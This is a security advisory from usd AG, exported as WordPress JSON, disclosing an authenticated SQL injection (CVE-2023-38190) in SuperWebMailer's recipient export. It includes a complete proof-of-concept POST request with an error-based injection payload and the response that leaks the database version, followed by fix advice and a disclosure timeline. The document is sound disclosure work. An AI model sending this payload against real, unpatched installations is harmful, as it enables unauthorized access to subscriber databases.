{"id":21190,"date":"2023-10-20T15:00:44","date_gmt":"2023-10-20T13:00:44","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2023-0014\/"},"modified":"2023-10-23T09:57:47","modified_gmt":"2023-10-23T07:57:47","slug":"usd-2023-0014","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0014\/","title":{"rendered":"usd-2023-0014"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.22.2\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2023-0014 | SQL Injection in SuperWebMailer<\/h1>\n<h1><\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2023-0014<br \/><strong>Product<\/strong>: SuperWebMailer<br \/><strong>Affected Version<\/strong>: 9.00.0.01710<br \/><strong>Vulnerability Type<\/strong>: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')<br \/><strong>Security Risk<\/strong>: HIGH<br \/><strong>Vendor URL<\/strong>: <a>https:\/\/www.superwebmailer.de<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: No<br \/><strong>Vendor Status<\/strong>: Not fixed<br \/><strong>CVE number<\/strong>: CVE-2023-38190<br \/><strong>CVE Link<\/strong>: Pending<\/p>\n<h3>Desciption<\/h3>\n<p>SuperWebMailer is an online application for managing e-mail newsletters.<br \/>An authenticated SQL injection vulnerability was discovered during an engagement.<br \/>In an SQL injection attack, a malicious input is used to alter the queries the application sends to an SQL server.<\/p>\n<p>The application contains an export functionality that is vulnerable to an SQL injection attack.<br \/>This functionality uses a <strong>size<\/strong> parameter provided by the user inside an SQL query without any encoding or filtering being applied.<br \/>Consequently, an attacker may alter the SQL query in unintended ways.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The following request contains an SQL injection payload that displays the database version:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/exportrecipients.php<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">2<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">swm.example.com<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">PHPSESSID=8ko13lk184llt0rqop2pikbf55; smlswmCsrfToken=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiE<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">User-Agent<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept-Language<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">en-US,en;q=0.5<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">gzip, deflate<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/x-www-form-urlencoded<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">393<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">smlswmCsrfToken<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiE<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">OneMailingListId<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">MailingListName<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">Test+Empf%C3%A4ngerliste<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">step<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">4<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">Separator<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">%2C<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">Header1Line<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">AddQuotes<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">ExportLines<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">200<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">OnlyActiveRecipients<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">GroupsOption<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">groups<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">fields%5Bu_EMail%5D<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">fields%5Bu_FirstName%5D<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">fields%5Bu_LastName%5D<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">start<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">1,1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1)%3b%23<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&amp;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">ExportRowCount<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">5<\/span><\/pre>\n<\/div>\n<p>The database version is printed in the response as part of an error message:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">2<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">openresty<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Sun, 25 Sep 2022 16:48:39 GMT<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">text\/html; charset=utf-8<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">16149<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Expires<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mon, 26 Jul 1997 05:00:00 GMT<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cache-Control<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">no-store, no-cache, must-revalidate, max-age=0<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Last-Modified<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Sun, 25 Sep 2022 16:48:39 GMT<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Pragma<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">no-cache<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Frame-Options<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">SAMEORIGIN<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cache-Control<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">post-check=0, pre-check=0<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Vary<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Accept-Encoding<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Served-By<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">swm.example.com<\/span>[...]<span class=\"hll\" style=\"background: #263238;background-color: #2c3b41\">                <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">td<\/span> <span class=\"na\" style=\"background: #263238;color: #bb80b3\">colspan<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"2\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">b<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span>SQL-Fehler:<span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">b<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><span class=\"ni\" style=\"background: #263238;color: #89ddff\">&amp;nbsp;<\/span>XPATH syntax error: ':10.5.15-MariaDB-0+deb11u1' 1105<span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">br<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">\/&gt;&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">br<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">\/&gt;<\/span><\/span>                                <span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">b<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span>SQL-Anweisung:<span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">b<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><span class=\"ni\" style=\"background: #263238;color: #89ddff\">&amp;nbsp;<\/span>SELECT DISTINCT u_EMail, u_FirstName, u_LastName, **testempfngerliste_members**.**id** FROM **testempfngerliste_members**   ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);#, 200<span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">br<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">\/&gt;&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">br<\/span> <span class=\"p\" style=\"background: #263238;color: #89ddff\">\/&gt;&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">td<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span>[...]<span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">body<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">html<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">&gt;<\/span><\/pre>\n<\/div>\n<h3>Fix<\/h3>\n<p>SQL injection vulnerabilities can be prevented by using prepared statements with parameterized queries. Additionally, all input to the application should be treated as potentially dangerous and consequently validated on the server-side.<\/p>\n<h3>References<\/h3>\n<p><a>https:\/\/cwe.mitre.org\/data\/definitions\/89.html<\/a><br \/>https:\/\/owasp.org\/www-community\/attacks\/SQL_Injection<\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2022-09-26<\/strong>: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.<\/li>\n<li><strong>2023-04-20<\/strong>: First contact request via info@superwebmailer.de.<\/li>\n<li><strong>2023-05-08<\/strong>: Reminder sent via info@superwebmailer.de and contact form.<\/li>\n<li><strong>2023-05-15<\/strong>: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.<\/li>\n<li><strong>2023-05-25<\/strong>: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com<\/li>\n<li><strong>2023-06-05<\/strong>: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).<\/li>\n<li><strong>2023-07-17<\/strong>: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.<\/li>\n<li><strong>2023-08-17<\/strong>: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.<\/li>\n<li><strong>2023-10-02<\/strong>: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.<\/li>\n<li><strong>2023-10-20<\/strong>: Vulnerabilities disclosed by usd AG.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2023-0014 | SQL Injection in SuperWebMailer Advisory ID: usd-2023-0014Product: SuperWebMailerAffected Version: 9.00.0.01710Vulnerability Type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')Security Risk: HIGHVendor URL: https:\/\/www.superwebmailer.deVendor acknowledged vulnerability: NoVendor Status: Not fixedCVE number: CVE-2023-38190CVE Link: Pending Desciption SuperWebMailer is an online application for managing e-mail newsletters.An authenticated SQL injection vulnerability was [&hellip;]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-21190","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=21190"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21190\/revisions"}],"predecessor-version":[{"id":21197,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21190\/revisions\/21197"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=21190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}